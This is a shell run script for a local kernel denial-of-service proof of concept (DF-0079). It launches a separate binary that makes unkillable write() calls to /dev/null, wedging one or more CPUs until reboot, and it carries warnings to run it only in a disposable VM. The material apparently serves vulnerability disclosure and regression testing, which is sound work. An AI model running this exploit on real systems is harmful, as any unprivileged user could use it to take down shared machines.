DF-0079 / run.sh
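#!/bin/sh
# DF-0079 run script. Demonstrates the infinite-loop DoS.
#
# Run as an UNPRIVILEGED user (maxx, uid 1001). /dev/null is mode 0666 so no
# privilege is required. The single write() below will NEVER return on a
# vulnerable kernel: it pegs one CPU at 100% in kernel (mmrw) forever and the
# process cannot be killed (only a reboot recovers). Each additional copy
# wedges another core.
#
# WARNING: this is a full-system local DoS. On a small guest it can make the
# machine unresponsive to ssh within ~1 second. Run in a disposable VM and
# hard-reset afterwards.
#
# Usage:
#   ./run.sh        # wedge 1 CPU forever
#   ./run.sh 4      # fork 4 copies to wedge 4 CPUs
#
# To observe the wedged thread before it starves the box, run (as root, from
# another session, immediately) something like:
#   while true; do pgrep -n df0079 | xargs -r ps -o pid,stat,pcpu,cputime,args -p; sleep 0.2; done
# (or use the serial-console watcher watch_df0079.sh so output survives a reset).
#
# NOTE(review): on a kernel carrying the fix the write() should presumably
# return and this script exit normally, so it can double as a regression
# check for the fix -- confirm against the patched build.
#
# Arguments: $1 - number of copies to launch (default 1); positive integer.
# Exits:     1 if the script's own directory cannot be entered,
#            2 on a malformed copy count; otherwise does not return while
#            the kernel is vulnerable.

# Work from the script's directory so ./df0079 resolves regardless of the
# caller's cwd. /bin/sh does not abort on a failed cd, so check it explicitly
# rather than falling through to a "command not found" on ./df0079.
cd "$(dirname "$0")" || exit 1

N=${1:-1}

# Reject anything that is not a positive decimal integer before it reaches
# `-le` (which would print a test error) or df0079's argv. 0 is refused too:
# the original message would announce "0 process(es)" and then launch one.
case "$N" in
  ''|*[!0-9]*|0)
    printf 'DF-0079: copy count must be a positive integer, got "%s"\n' "$N" >&2
    exit 2
    ;;
esac

# printf rather than echo so the output does not depend on echo's handling of
# leading dashes/backslashes in the argument.
printf 'DF-0079: launching %s wedge process(es) as uid=%s on /dev/null\n' \
  "$N" "$(id -u)"

if [ "$N" -le 1 ]; then
  ./df0079          # never returns on a vulnerable kernel
else
  ./df0079 "$N"     # the copy count is handed to df0079, which presumably forks the copies itself
fi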